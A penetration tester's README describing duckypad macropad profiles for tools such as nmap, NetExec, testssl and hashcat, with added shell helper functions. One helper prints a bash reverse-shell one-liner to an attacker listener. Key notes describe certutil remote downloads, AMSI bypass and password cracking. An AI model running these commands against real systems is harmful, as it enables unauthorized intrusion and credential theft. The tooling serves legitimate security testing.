I am a pentester and these are my duckypad profiles. I use them constantly and am constantly adding to and updating them. A key name ending in +v pastes from your clipboard, which is useful for pasting a hostname into nmap or testssl. I am not entirely consistent with the naming.
If you are unsure what a duckypad is, or would like to buy one (non-affiliated link): https://www.tindie.com/products/dekunukem/duckypad-do-it-all-mechanical-macropad/
The following previews were generated using this script: https://github.com/jayrox/duckypad_profile_preview_gen
I am starting to add documentation to the keys using a comment format of REM DOC:
in the individual key scripts; the generator parses these comments out into the Key descriptions shown below.
Key descriptions:
- Windows: Windows based commands
- NumPad: NumPad
- Help: Helpful websites
- SetVars: Env variables used in the various scripts.
- HTB: Hacktheboxisms - http://app.hackthebox.eu/
- TestSSL: Testing TLS/SSL encryption anywhere on any port - https://github.com/drwetter/testssl.sh
- NMap: the Network Mapper. - https://github.com/nmap/nmap
- PS: PowerShell
- Witness: Witness Me
- NetExec: https://github.com/Pennyw0rth/NetExec
- curl: cURL
- Nikto: Nikto
- GoBustr: GoBuster
Help | ||
---- | ||
curl |
Key descriptions:
- Skpfish: SkipFish
ADSI | ||
Respond | ||
Key descriptions:
- CME: CrackMapExec
- John: Password cracker John
- PGo: Little automation to run the CalcyIV/PokeGenie scanners
VS | ||
Waymore | - | - |
- | - | - |
Ansible | - |
intro | hide | dev |
taskMgr | files | sysInfo |
diskMgr | - | taskViw |
7 | 8 | 9 |
4 | 5 | 6 |
1 | 2 | 3 |
0 | . |
Key descriptions:
- WADComs: Launches Firefox to https://wadcoms.github.io/
- LOLBAS: Launches Firefox to https://lolbas-project.github.io/
- GTFOBin: Launches Firefox to https://gtfobins.github.io/
- Payload: Launches Firefox to https://github.com/swisskyrepo/PayloadsAllTheThings
Explain | WADComs | LOLBAS |
tldr | GTFOBin | Payload |
- | - | |
- | - | - |
- | - |
Key descriptions:
- Bash: Adds a few aliases to the .bashrc file to help set env variables that can be used in other profiles
- ZSH: Adds a few aliases to the .zshrc file to help set env variables that can be used in other profiles
- Fish: Adds a few aliases to the ~/.config/fish/config.fish file to help set env variables that can be used in other profiles
- SetVars: Go to the SetVars profile.
- | - | - |
- | - | - |
- | - | - |
- |
Key descriptions:
- ECHO: Print out env variables used in the various scripts.
Host(s) | Port(s) | - |
Domain | DC IP | - |
User | Pass | - |
- | ||
- |
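The Bash/ZSH/Fish keys and the SetVars profile only say that aliases set DP_* variables which other profiles "require"; what follows is an added example (not code from the profile repository) of what those aliases can be: a function that sets the variables, a check that fails fast when a profile's required variables are missing, the ECHO key with the password masked, and one consumer that builds a NetExec shares command from them. The DP_* names and the nxc flags are real; the function names, the defaults (DP_HOSTS falls back to the DC IP, DP_PORTS to 445) and the sample credentials are assumptions.

```shell
# Added example, not the repository's own profile code.
# SetVars: set the DP_* variables the other profiles read.
# Usage: dp_set <user> <pass> <domain> <dc_ip> [hosts] [ports]
dp_set() {
  [ "$#" -ge 4 ] || { echo "usage: dp_set user pass domain dc_ip [hosts] [ports]" >&2; return 2; }
  DP_USERNAME=$1 DP_PASSWORD=$2 DP_DOMAIN=$3 DP_DC_IP=$4
  DP_HOSTS=${5:-$DP_DC_IP} DP_PORTS=${6:-445}   # assumed defaults
  export DP_USERNAME DP_PASSWORD DP_DOMAIN DP_DC_IP DP_HOSTS DP_PORTS
}

# Fail fast when a profile's required variables are unset or empty.
# Usage: dp_require DP_USERNAME DP_PASSWORD ...   (returns 1 and lists what is missing)
dp_require() {
  local name value missing
  missing=""
  for name in "$@"; do
    # only accept identifiers before handing the name to eval
    case "$name" in [0-9]*|*[!A-Za-z0-9_]*) echo "dp_require: bad variable name '$name'" >&2; return 2 ;; esac
    eval "value=\${$name:-}"          # indirect expansion of the named variable
    [ -n "$value" ] || missing="$missing $name"
  done
  [ -z "$missing" ] || { echo "dp_require: not set:$missing (go to the SetVars profile)" >&2; return 1; }
}

# ECHO key: print the variables, masking the password so it does not land in a screenshot or log.
dp_echo() {
  local name value
  for name in DP_USERNAME DP_PASSWORD DP_DOMAIN DP_DC_IP DP_HOSTS DP_PORTS; do
    eval "value=\${$name:-}"
    if [ "$name" = DP_PASSWORD ] && [ -n "$value" ]; then value='********'; fi
    printf '%s=%s\n' "$name" "$value"
  done
}

# Example consumer (NetExec Shares key): check first, then build the command line.
# The password ends up on argv, exactly as the profile would type it.
nxc_shares_cmd() {
  dp_require DP_USERNAME DP_PASSWORD DP_DOMAIN DP_HOSTS || return 1
  printf 'nxc smb %s -u %s -p %s -d %s --shares\n' "$DP_HOSTS" "$DP_USERNAME" "$DP_PASSWORD" "$DP_DOMAIN"
}
```

Drop the functions into .bashrc (or the zsh/fish equivalents) and call dp_require with the list from each profile's SetVars line before its first key fires; running a key with an empty DP_PASSWORD otherwise silently turns an authenticated check into an anonymous one.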
Key descriptions:
- CU Enc: Uses certutil to base64 encode a file (certutil -encode infile outfile)
- CU Dec: Uses certutil to base64 decode a file (certutil -decode infile outfile)
- CU DL: Uses certutil to download a remote file (certutil -urlcache -split -f URL outfile; widely flagged by AV/EDR)
- | - | - |
test | test2 | - |
- | - |
Key descriptions:
- Squiddy: Launch Squiddy, my personal pentest tracking and report generation tool
Squiddy | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |
Setup | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |
Key descriptions:
- Procs: Get running processes
- Upgrade: Upgrade reverse shell
Sudo-l | FndRoot | ls -la |
GetCap | AppArmo | Procs |
------- | ------- | |
Hosts | NC 4444 | Srv80 |
Key descriptions:
- +Hosts: Prompts for an IP and a hostname, then adds them to the /etc/hosts file
- GetMail: Get Mail folders
- BashRev: Uses LHOST and LPORT from the SetVars profile
- BashRev: More info: https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/
- FixVPN: Updates the HTB VPN so it is NOT the default/main connection, which fixes the issue where external resources fail to load.
Py2SH | Py3SH | |
GetMail | - | |
- | - | - |
- | FixVPN | |
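The +Hosts and BashRev keys above are described only by what they do. Below is an added example (not code from the profile repository) of the two behind the keys: an /etc/hosts helper that validates the IP and hostname and refuses to add a duplicate, and a builder for the bash reverse-shell one-liner from the LHOST/LPORT variables that SetVars exports. The HOSTS_FILE override, the function names and the sample addresses are assumptions; the one-liner itself is the standard /dev/tcp form linked from the BashRev key.

```shell
# Added example, not the repository's own profile code.
# Validate a dotted-quad IPv4 address (four octets, each 0-255).
is_ipv4() {
  local ip n oct oldifs
  ip=$1; n=0
  case "$ip" in ''|*[!0-9.]*|.*|*.|*..*) return 1 ;; esac
  oldifs=$IFS; IFS=.
  for oct in $ip; do
    n=$((n + 1))
    # length check first so an absurdly long octet cannot overflow the integer test
    if [ "${#oct}" -gt 3 ] || [ "$oct" -gt 255 ]; then IFS=$oldifs; return 1; fi
  done
  IFS=$oldifs
  [ "$n" -eq 4 ]
}

# Validate a hostname: letters, digits, dots and hyphens only, no leading hyphen or dot.
is_hostname() {
  case "$1" in ''|*[!A-Za-z0-9.-]*|-*|.*|*.) return 1 ;; esac
  [ "${#1}" -le 253 ]
}

# +Hosts: append "ip hostname" to the hosts file unless that exact pair is already there.
# HOSTS_FILE defaults to /etc/hosts (run as root or via sudo); point it elsewhere to test.
add_host() {
  local ip host file
  ip=$1; host=$2; file=${HOSTS_FILE:-/etc/hosts}
  is_ipv4 "$ip" || { echo "add_host: bad IP '$ip'" >&2; return 2; }
  is_hostname "$host" || { echo "add_host: bad hostname '$host'" >&2; return 2; }
  # exact field match, so 10.10.10.1 is not "present" just because 10.10.10.10 is
  if awk -v ip="$ip" -v h="$host" \
       '$1 == ip { for (i = 2; i <= NF; i++) if ($i == h) found = 1 } END { exit !found }' \
       "$file" 2>/dev/null; then
    echo "add_host: $ip $host already in $file"
    return 0
  fi
  printf '%s\t%s\n' "$ip" "$host" >> "$file"
}

# The key itself: prompt for both values, then add them.
add_host_prompt() {
  local ip host
  printf 'IP: ';       read -r ip
  printf 'Hostname: '; read -r host
  add_host "$ip" "$host"
}

# BashRev: print the bash reverse-shell one-liner for the LHOST/LPORT set in SetVars.
# Start the listener first (nc -lvnp "$LPORT"), then run the printed line on the target.
bash_rev_cmd() {
  [ -n "${LHOST:-}" ] && [ -n "${LPORT:-}" ] || { echo "bash_rev_cmd: set LHOST and LPORT first" >&2; return 2; }
  is_ipv4 "$LHOST" || { echo "bash_rev_cmd: LHOST '$LHOST' is not an IPv4 address" >&2; return 2; }
  case "$LPORT" in *[!0-9]*) echo "bash_rev_cmd: LPORT must be numeric" >&2; return 2 ;; esac
  [ "${#LPORT}" -le 5 ] && [ "$LPORT" -ge 1 ] && [ "$LPORT" -le 65535 ] \
    || { echo "bash_rev_cmd: LPORT '$LPORT' out of range" >&2; return 2; }
  # '>&' sends stdout and stderr to the socket; '0>&1' must follow it so stdin does too
  printf 'bash -i >& /dev/tcp/%s/%s 0>&1\n' "$LHOST" "$LPORT"
}
```

The duplicate check matters on a long engagement: repeatedly pressing +Hosts for the same box otherwise leaves several conflicting lines, and only the first one wins at resolution time.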
Key descriptions:
- Whoami: Get Windows user's privs
- Whoami: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
Whoami | - | - |
- | - | |
Dir A | Set | - |
- | - | - |
Key descriptions:
- TLS12: Enable TLS 1.2
- Proxy: Set up PowerShell to use the corporate proxy with authentication
- Daren: Some PowerShell functions from Daren
AMSI3 | ||
PwrCat | ||
LngMode | ||
MpPref | ||
GetC_DN | Priv | Obj SID |
GetU_Pr | - | S- SID |
ExecPol | U GUID | C GUID |
IEX | - | - |
DL | - | - |
- | - | - |
- | - | - |
Key descriptions:
- Mass+v: Runs TestSSL against hosts in the clipboard. One host per line, saves output as JSON
Full | Short | Mass+v |
Full | Fast | |
Mass+v | ||
- | ||
- | Paste | |
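The Mass+v key runs TestSSL against every host in the clipboard, one per line, saving JSON. As an added example (not code from the profile repository), here is a shell function that does the same from stdin so it can be fed by whatever clipboard tool you have (xclip -o, xsel, pbpaste): it strips carriage returns and comments, rejects anything that is not a hostname/IP with an optional :port, and writes one JSON file per host via testssl.sh's --jsonfile option. TESTSSL, DRY_RUN and the output directory layout are assumptions; bracketed IPv6 targets are deliberately not handled.

```shell
# Added example, not the repository's own profile code.
# Mass+v: run testssl.sh against every host[:port] read from stdin, one JSON file per host.
# Usage: xclip -o | mass_testssl [outdir]      (DRY_RUN=1 prints the commands instead)
mass_testssl() {
  local outdir line target json
  outdir=${1:-testssl-out}
  mkdir -p "$outdir" || return 1
  while IFS= read -r line || [ -n "$line" ]; do
    # strip CR (Windows clipboards), trailing comments and surrounding whitespace
    target=$(printf '%s' "$line" | tr -d '\r' | sed 's/#.*//; s/^[[:space:]]*//; s/[[:space:]]*$//')
    [ -n "$target" ] || continue
    # only hostname/IP characters plus one optional :port reach the tool; IPv6 is out of scope here
    case "$target" in
      *[!A-Za-z0-9.:-]*|*:*:*) echo "mass_testssl: skipping '$target'" >&2; continue ;;
    esac
    json="$outdir/$(printf '%s' "$target" | tr ':' '_').json"
    if [ "${DRY_RUN:-0}" = 1 ]; then
      printf '%s --jsonfile %s %s\n' "${TESTSSL:-testssl.sh}" "$json" "$target"
    else
      # </dev/null so testssl.sh cannot consume the rest of the host list from stdin
      "${TESTSSL:-testssl.sh}" --jsonfile "$json" "$target" </dev/null
    fi
  done
}
```

The </dev/null redirect is the part people get wrong when looping a bash-based scanner over a list on stdin: without it the first run can swallow every remaining host.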
Key descriptions:
- SetVars: This profile requires the DP_USERNAME, DP_PASSWORD, DP_DOMAIN, and DP_HOSTS env variables be set. Go to the SetVars profile to set.
Simple | - | |
LDAP | - | |
RidBrut | ||
Key descriptions:
- RIDBrut: Enumerate usernames
- Shares: Enumerate SMB shares.
- Users: Enumerate domain users.
- Spider: Spider SMB shares for files.
- Basic: Test connection
- Help: Try username as blank, 'anonymous', 'guest', or pass a file of users
ZeroLog | ||
Basic | - | - |
- | - | - |
- |
BasicSS | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |
Basic | - | |
- | - | - |
- | - | - |
- | - | - |
- |
Key descriptions:
- ikL: Include response headers in output, allow insecure connections and follow redirects
- ikL+v: Include response headers in output, allow insecure connections and follow redirects. Pastes URL from clipboard
ikL | dl_file | - |
dl_file | - | |
- | - | - |
- | - | - |
- |
Basic | - | - |
80,443 | - | - |
- | - | - |
- | - | - |
- |
Dir | - | |
- | - | Follow |
- | - | Output |
- | - | K Cert |
- |
FuzzSub | Size | - |
- | - | - |
- | - | - |
- | - | - |
- |
Key descriptions:
- Size: Filter on size
- Words: Filter on words
Dir | - | - |
Sub DNS | Size | |
- | - | - |
- | - | - |
- |
SCIR | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |
Key descriptions:
- SetVars: This profile requires the DP_USERNAME, DP_PASSWORD, DP_DOMAIN, and DP_DC_IP env variables be set. Go to the SetVars profile to set.
Neo4j | Start | - |
PyBlood | - | - |
- | - | - |
- | CrtiVln | - |
- |
Display | SAM | Title |
Admin | - | - |
- | - | - |
- | - | - |
- | - |
venv+r | - | |
- | - | - |
- | - | - |
- | - | - |
- | - |
Key descriptions:
- Server: Use a specific dns server
dig | - | Types |
Server | - | - |
- | - | - |
- | - | - |
- | - |
Key descriptions:
- SetVars: This profile requires the DP_USERNAME, DP_PASSWORD, DP_DOMAIN, and DP_HOSTS env variables be set. Go to the SetVars profile to set.
Base | - | |
Recurse | Grep | Find |
- | - | - |
- | - | - |
Key descriptions:
- Get: Get individual file
Connect | - | |
- | - | |
- | ||
- | - | - |
Start | - | - |
- | - | - |
- | - | - |
- | - | - |
- |
Key descriptions:
- SetVars: This profile requires the DP_USERNAME, DP_PASSWORD, and DP_DOMAIN env variables be set. Go to the SetVars profile to set.
- | ||
- | - | - |
- | ||
- | - | - |
Key descriptions:
- Crawl: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
- FSCode: Ignore certain HTTP status codes
- Proxy: Set proxy, Burp is default
Crawl | - | Out |
FSCode | Timeout | Threads |
- | - | - |
Proxy | - | - |
- |
Key descriptions:
- SetVars: This profile requires the DP_USERNAME, DP_PASSWORD, DP_DOMAIN, DP_PORTS, and DP_HOSTS env variables be set. Go to the SetVars profile to set.
- | ConVars | |
- | ||
Tables | ||
DBs | ||
Host | File | |
dbms | DBs | Tables |
Data | DB | Table |
- | - | |
- |
Connect | - | - |
DBs | Use DB | - |
Tables | - | - |
- | - | - |
- |
Key descriptions:
- Detect: Use hashcat to detect hashing algorithm
- Crack: Use hashcat to crack hashes in file
- Show: Show cracked password from hashcat
Detect | - | - |
Crack | - | Show |
- | - | - |
- | - | - |
- |
Key descriptions:
- Compile: Compile a .cs file
Compile | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |
Key descriptions:
- Crack: Update the path for rockyou.txt; it may need to be extracted from the tar.gz first
- Crack: locate rockyou.txt
- Crack: tar -xvf /full/path/to/rockyou.txt.tar.gz
- Show: Show any cracked passwords
- SSH2Joh: Find the path for SSH2John: locate ssh2john
- SSH2Joh: Python script: https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
Show | - | |
- | - | |
- | - | - |
- | - | - |
- |
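The Crack key notes above (locate rockyou.txt, extract the tar.gz) are a manual procedure; as an added example (not code from the profile repository), here is a function that does it once and prints the path, handling both the rockyou.txt.gz that current Kali ships and the older rockyou.txt.tar.gz layout the notes mention, plus a wrapper that runs John with that list. WORDLIST_DIR, its /usr/share/wordlists default and the function names are assumptions.

```shell
# Added example, not the repository's own profile code.
# Print the path of a plain-text rockyou.txt, extracting it first if only the
# compressed copy exists. WORDLIST_DIR defaults to /usr/share/wordlists (assumed Kali layout).
rockyou_path() {
  local dir plain
  dir=${WORDLIST_DIR:-/usr/share/wordlists}
  plain="$dir/rockyou.txt"
  if [ ! -f "$plain" ]; then
    if [ -f "$plain.gz" ]; then
      # gzip -dc leaves the archive in place (-k is not portable)
      gzip -dc "$plain.gz" > "$plain" || { rm -f "$plain"; return 1; }
    elif [ -f "$plain.tar.gz" ]; then
      tar -xzf "$plain.tar.gz" -C "$dir" || return 1
    else
      echo "rockyou_path: no rockyou.txt under $dir (try: locate rockyou.txt)" >&2
      return 1
    fi
  fi
  [ -s "$plain" ] || { echo "rockyou_path: extraction produced no usable file" >&2; return 1; }
  printf '%s\n' "$plain"
}

# Crack key: john --wordlist=<rockyou> <hashfile...>; Show key afterwards: john --show <hashfile>
john_rockyou() {
  local wl
  wl=$(rockyou_path) || return 1
  john --wordlist="$wl" "$@"
}
```

Because the function prints the final path rather than a fixed string, the profile key can stay as `john --wordlist="$(rockyou_path)" hashes.txt` and keep working across a Kali upgrade that changes the archive format.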
URLs +v | ||
- | - | - |
- | - | - |
- | - | - |
- |
Key descriptions:
- Scan: Does not currently work
Scan | - | - |
- | - | - |
- | - | - |
- | - | - |
- | - |